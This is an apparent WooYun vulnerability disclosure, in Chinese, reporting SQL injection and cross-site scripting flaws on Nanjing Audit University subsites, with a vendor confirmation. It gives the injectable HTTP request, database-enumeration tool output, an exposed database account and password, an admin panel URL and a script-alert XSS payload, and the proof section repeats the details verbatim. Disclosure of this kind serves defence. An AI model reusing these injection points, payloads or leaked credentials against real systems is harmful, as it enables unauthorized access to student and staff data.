漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-046287
漏洞标题:南京审计学院某分站SQL注射漏洞
相关厂商:nau.edu.cn
漏洞作者: saar
提交时间:2013-12-19 17:19
修复时间:2014-02-02 17:19
公开时间:2014-02-02 17:19
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-12-19: 细节已通知厂商并且等待厂商处理中
2013-12-19: 厂商已经确认,细节仅向厂商公开
2013-12-29: 细节向核心白帽子及相关领域专家公开
2014-01-08: 细节向普通白帽子公开
2014-01-18: 细节向实习白帽子公开
2014-02-02: 细节向公众公开
简要描述:
南京审计学院某分站SQL注射漏洞
详细说明:
0x01:南京审计学院教务系统漏洞:
地址:http://jwc.nau.edu.cn/
SQL漏洞:
POST:
POST /GetClassNameListByTerm.ashx HTTP/1.1
Content-Length: 51
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://jwc.nau.edu.cn:80/
Cookie: _D_SID=8B740523; ASP.NET_SessionId=iadfilbfeitpofz03abg0p45
Host: jwc.nau.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
term=9XYwlDXG
跑出数据库:
web application technology: Nginx
back-end DBMS: Microsoft SQL Server 2
[22:11:33] [INFO] fetching database n
available databases [201]:
[*] gwkh
[*] jwcinfo
[*] master
[*] model
[*] msdb
[*] MSEA
[*] MSEA_Data_20130621
[*] MSEA_Data_20130622
。。。。。。。------------》略
[*] MSEA_Data_20131212
[*] MSEA_Data_20131213
[*] MSEA_Data_20131214
[*] MSEA_Data_20131215
[*] MSEA_Data_20131216
[*] MSEA_Data_20131217
[*] MSEA_History
[*] MyData
[*] naucjb200420051
[*] naustu
[*] PgbData
[*] PMS_Data_20130605
[*] PMS_Data_20130606
[*] PMS_Data_20130607
[*] PMS_Data_20130608
[*] PMS_Data_20130609
[*] PMS_Data_20130610
[*] PMS_Data_20130611
[*] PMS_V2
[*] Student_Info
[*] tempdb
0x02:另外还有分站的漏洞:
SQL注射:http://210.28.92.133/njsj/bbs/bbslist.jsp?boardid=6
跑出数据库账号密码:a 200196
后台:
http://210.28.92.133/njsj/bbs/admin/index.jsp
1000多用户数据查看:
0x03:信息学院分站SQL注射以及跨站
漏洞地址:
http://210.28.92.107/search?keyword=1
XSS:
http://210.28.92.107/search?keyword=<script>alert(1)</script>
keyword未过滤导致存在SQL和XSS
最后过滤坝。
漏洞证明:
0x01:南京审计学院教务系统漏洞:
地址:http://jwc.nau.edu.cn/
SQL漏洞:
POST:
POST /GetClassNameListByTerm.ashx HTTP/1.1
Content-Length: 51
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://jwc.nau.edu.cn:80/
Cookie: _D_SID=8B740523; ASP.NET_SessionId=iadfilbfeitpofz03abg0p45
Host: jwc.nau.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
term=9XYwlDXG
跑出数据库:
web application technology: Nginx
back-end DBMS: Microsoft SQL Server 2
[22:11:33] [INFO] fetching database n
available databases [201]:
[*] gwkh
[*] jwcinfo
[*] master
[*] model
[*] msdb
[*] MSEA
[*] MSEA_Data_20130621
[*] MSEA_Data_20130622
。。。。。。。------------》略
[*] MSEA_Data_20131212
[*] MSEA_Data_20131213
[*] MSEA_Data_20131214
[*] MSEA_Data_20131215
[*] MSEA_Data_20131216
[*] MSEA_Data_20131217
[*] MSEA_History
[*] MyData
[*] naucjb200420051
[*] naustu
[*] PgbData
[*] PMS_Data_20130605
[*] PMS_Data_20130606
[*] PMS_Data_20130607
[*] PMS_Data_20130608
[*] PMS_Data_20130609
[*] PMS_Data_20130610
[*] PMS_Data_20130611
[*] PMS_V2
[*] Student_Info
[*] tempdb
0x02:另外还有分站的漏洞:
SQL注射:http://210.28.92.133/njsj/bbs/bbslist.jsp?boardid=6
跑出数据库账号密码:a 200196
后台:
http://210.28.92.133/njsj/bbs/admin/index.jsp
1000多用户数据查看:
0x03:信息学院分站SQL注射以及跨站
漏洞地址:
http://210.28.92.107/search?keyword=1
XSS:
http://210.28.92.107/search?keyword=<script>alert(1)</script>
keyword未过滤导致存在SQL和XSS
最后过滤坝。
修复方案:
修复过滤
版权声明:转载请注明来源 saar@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2013-12-19 21:02
厂商回复:
漏洞很多,尤其是牵涉到教务漏洞,非常感谢!
最新状态:
暂无